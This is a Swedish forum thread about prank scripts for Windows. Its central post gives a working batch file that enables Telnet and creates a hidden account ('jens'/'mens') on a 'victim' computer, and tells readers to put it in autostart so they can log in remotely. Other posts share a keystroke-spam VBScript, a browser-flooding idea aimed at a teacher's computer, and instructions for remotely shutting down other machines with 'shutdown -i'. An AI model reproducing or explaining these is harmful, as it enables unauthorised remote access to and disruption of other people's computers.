Jävulskap & annat kul med .cmd/.bat filer

Permalänk
Medlem

ja då, :P, det är ju snart jul...

set objshell = wscript.createobject("wscript.shell")
wscript.sleep 100

response = msgbox ("failed to say 'God jul och gott nytt år'!", 18,"critical message!")
wscript.sleep 3000
response = msgbox ("just kidding! God jul och gott nytt år!", 8,"God jul!")

spara som t ex julkort.vbs

ett litet julkort helt enkelt

edit: kanske inte är så mkt svineri..:P

@echo off

sc config tlntsvr start= auto
cls
net start server
cls
net start telnet
cls
tlntadmn start
cls
net user jens mens /add
cls
net localgroup användare jens /del
cls
net localgroup telnetclients /add
cls
net localgroup telnetclients jens /add
cls
tlntadmn config sec = -ntlm +passwd

spara som en .bat fil och kör på valfri dator med internet uppkoppling.glöm inte att kolla ip:n . gå sedan in på cmd på ngn anna dator och skriv in telnet ip.adressen.på.offret. användarnamnet är jens och lösen är mens. sen kan man göra det mesta man kan göra i cmd på en vanlig dator. för bästa effekt, lägg i autostart.. går att ändra lite i den för att göra den ännu bättre. god jul

edit: glömde säga att om det är ngn dator i nätverket så kan man ju pinga den.

Permalänk
Medlem

Haha, den sista va bra ;D

God jul själv!

Permalänk
Medlem

jag vet inte om jag redan har postat detta men jag gör det igen.

set wshshell = createobject("wscript.shell") wscript.sleep 1000 for i=1 to 100 wshshell.sendkeys "spam" wshshell.sendkeys "{enter}" next

ett litet spam script.
det går att ändra 100 i raden "for i=1 to 100" till så många meddelanden du vill skicka. jag gjorde en instruktionsfilm för er som inte fattar :P.
http://youtube.com/watch?v=nd093OM_eYY

Permalänk
Medlem

Kolla på http://epic-games.se/ finns lite där om sånt^^

Enjoy

Permalänk
Medlem

Finns det någon bra sida där man kan börja och lära sig vbscript?

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av XaaR
Finns det någon bra sida där man kan börja och lära sig vbscript?

http://www.w3schools.com/vbscript/default.asp

en annan rolig grej på lan är att skriva in "shutdown -i" i kör... det visar en liten ruta där man kan välja vilken ip man ska stänga av

Permalänk
Medlem

Mjo, jag tycker den sidan är bra^^ den är min, bygger på den just nu^^
samlar information och Convertar till php5

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av n0tic
Mjo, jag tycker den sidan är bra^^ den är min, bygger på den just nu^^
samlar information och Convertar till php5

är det du som har gjort den?

Permalänk
Medlem

Ja, de e de ^^

Håller på att fixa lite mera så att folk kan gå in och sätta in egna scripts som dom gjort^^ Och byter design helt^^

Permalänk
Medlem

aa, den kan behöva en asiktslyftning:P. kan du inte fixa så att den finns på svenska också?

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av n0tic
ehrm, svenska?? hela sidan är på svenska??? :S
för mig iaf?

ajja har du kunskaper om PHP koder eller är bra på att bygga hemsidor kan du ju få hjälpa till att bygga ihop sidan?
Ta kontakt via Hotmail, MSN eller lägg in ett nytt inlägg här...

Hotmail:
N0tiC_91@hotmail.com
MSN:
victor.rimsby@comhem.se

ahade så länge!

jag syftade på www.w3schools.com

Permalänk

Finns det inget script som typ öppnar ett dokument om och om tills datan hänger sej?

ska kanske testa på våran 65 åriga "data"-lärare

Permalänk
Citat:

Ursprungligen inskrivet av Quadspider
Finns det inget script som typ öppnar ett dokument om och om tills datan hänger sej?

ska kanske testa på våran 65 åriga "data"-lärare

tvivlar på att ett dokument skulle skapa nån större ansträngning till datorn. däremot kan du ju använda dig av internet. använda nåt script som öpnnar din webläsare med en specifik adress typ 500 gånger. lovar dig att datorn blir seg av det. har själv dödat min laptop med det några gånger när jag testat det

Visa signatur

All the same, take me away.
We're Dead to the World

Permalänk
Medlem

hej jag skulle göra en snabb länk till en intenet sida så jag gjorde en .bat fil där jag bara skrev
@echo
cls
:name
Start (länken till sidan)

men nu undrar jag om den går att lägga i systemfältet via en kommando?
kan jag bygga på det med något roligt

tack på förhand

Permalänk
Medlem

marcko: hur menar du?

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av marcko
hej jag skulle göra en snabb länk till en intenet sida så jag gjorde en .bat fil där jag bara skrev
@echo
cls
:name
Start (länken till sidan)

men nu undrar jag om den går att lägga i systemfältet via en kommando?
kan jag bygga på det med något roligt

tack på förhand

Om du menart fältet brevid startmenyn så finns det någon mapp i Application Data mappen i din användare där alla genvägar ligger.
I vista är det : C:\Users\*användarnamn*\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av XaaR
Om du menart fältet brevid startmenyn så finns det någon mapp i Application Data mappen i din användare där alla genvägar ligger.
I vista är det : C:\Users\*användarnamn*\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Nae jag menar fältet vi klocka och det
där alla pogram man använder ligger
tack för din hjälp

Permalänk
Citat:

Ursprungligen inskrivet av 22223

en annan rolig grej på lan är att skriva in "shutdown -i" i kör... det visar en liten ruta där man kan välja vilken ip man ska stänga av [/B]

kan du förklara hur man gör det jag har nyss blvit medlemm och jag har varit väldigt intreserad av den här tråden och jag vill veta hur man ska göra för att den ska funka

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av robin2007
kan du förklara hur man gör det jag har nyss blvit medlemm och jag har varit väldigt intreserad av den här tråden och jag vill veta hur man ska göra för att den ska funka

antingen håller du inne windows knappen och trycker på r, lr så trycker du bara på "start" sen "kör...". när "kör..." rutan kommer upp så skriver du in cmd. där skriver du in "ping datornamn" byt ut "datornamn" datornamnet.kom ihåg ip adressen som kommer upp. gå in på "kör..." igen och skriv "shutdown -i" (utan situationstecken), och då kommer det upp en ny ruta. där trycker du på "lägg till..." och skriver in ip-adressen lr datornamnet på datorn du vill stänga av. välj bland de andra alternativen i rutan och skriv en kommentar om du vill. (den kommer att synas i avstängninsrutan som kommer upp. testa med din egen dator först) sen är det bara att trycka på ok.

Permalänk
Citat:

Ursprungligen inskrivet av 22223
antingen håller du inne windows knappen och trycker på r, lr så trycker du bara på "start" sen "kör...". när "kör..." rutan kommer upp så skriver du in cmd. där skriver du in "ping datornamn" byt ut "datornamn" datornamnet.kom ihåg ip adressen som kommer upp. gå in på "kör..." igen och skriv "shutdown -i" (utan situationstecken), och då kommer det upp en ny ruta. där trycker du på "lägg till..." och skriver in ip-adressen lr datornamnet på datorn du vill stänga av. välj bland de andra alternativen i rutan och skriv en kommentar om du vill. (den kommer att synas i avstängninsrutan som kommer upp. testa med din egen dator först) sen är det bara att trycka på ok.

jag fattar ända till data namnet och jag har fått upp rutam men jag kan testa med min egenå får jag se om det funkar

EDIT:jag har testat på min datas ip det funka utmärkt men jag funderar ändå vad som menas med data namnet kan du förklara?

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av robin2007
jag fattar ända till data namnet och jag har fått upp rutam men jag kan testa med min egenå får jag se om det funkar

EDIT:jag har testat på min datas ip det funka utmärkt men jag funderar ändå vad som menas med data namnet kan du förklara?

Datanamnet = Informationsnamn.
Datornamn = Din dators namn.

Din (data) dators namn hittar du under "Den här datorn" > "Egenskaper" > "Datornamn"

När ska alla lära sig skillnaden på data och dator ?

Permalänk

ok tack men då måste jag ju gå in där och kolla på mina kompisars dator men vi har 3 st datorer i vårat närverk fast en är i en annan bygnad men den är ändå i vårat närvärk och om jag skulle stänga ner mammas data när hon andvänder den. stort tack !

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Meggybot

När ska alla lära sig skillnaden på data och dator ?

jag håller med

robin2007: om de är i samma workgroup (arbetsgrupp) så är det oftast bara att söka efter datorer utan att skriva in ngt i sökrutan.

Permalänk

ok jag vet hur man gör nu men nu visade det sig att min och mammas data inte var i samma "workgroup" synd men jag får väll försjöka om jag är på något lan eller något

Permalänk
Medlem

din mammas dator, inte data.:P

Permalänk
Citat:

Ursprungligen inskrivet av 22223
din mammas dator, inte data.:P

jag har all tid i världen att lära mig att det heter mammas dator

Permalänk
Medlem

gör så att ett meddelande poppar upp varje gång du startar datorn där det står typ: dator, inte data.

Permalänk
Citat:

Ursprungligen inskrivet av 22223
gör så att ett meddelande poppar upp varje gång du startar datorn där det står typ: dator, inte data.

hur ska jag gör det?

Permalänk
Medlem

gå in på "kör..." och skriv in "regedit". då klickar du först på HKEY_LOCAL_MACHINE till vänster sen SOFTWARE sen Microsoft sen Windows NT sen CurrentVersion sen Winlogon. där finns det ett stränvärde som heter LegalNoticeCaption. dubbelklicka på den och skriv in vad du vill att det ska stå som "caption" (har glömt vad det heter på svenska ) och trycker på ok. sen dubbeklickar du på nästa strängvärde som heter LegalNoticeText och skriver in vad du vill att det ska stå i rutan.

Permalänk
Citat:

Ursprungligen inskrivet av 22223
gå in på "kör..." och skriv in "regedit". då klickar du först på HKEY_LOCAL_MACHINE till vänster sen SOFTWARE sen Microsoft sen Windows NT sen CurrentVersion sen Winlogon. där finns det ett stränvärde som heter LegalNoticeCaption. dubbelklicka på den och skriv in vad du vill att det ska stå som "caption" (har glömt vad det heter på svenska ) och trycker på ok. sen dubbeklickar du på nästa strängvärde som heter LegalNoticeText och skriver in vad du vill att det ska stå i rutan.

ok jag får se om jag orkar andvända den

Citat:

Ursprungligen inskrivet av GaMeR2K5
Skit samma om det klart o tydligt framgår vad man menar. I vissa fall så kan det ju vara viktigt att använda korrekta ord och stava rett.

och du bore veta i såfall att rätt stavas med ä inte e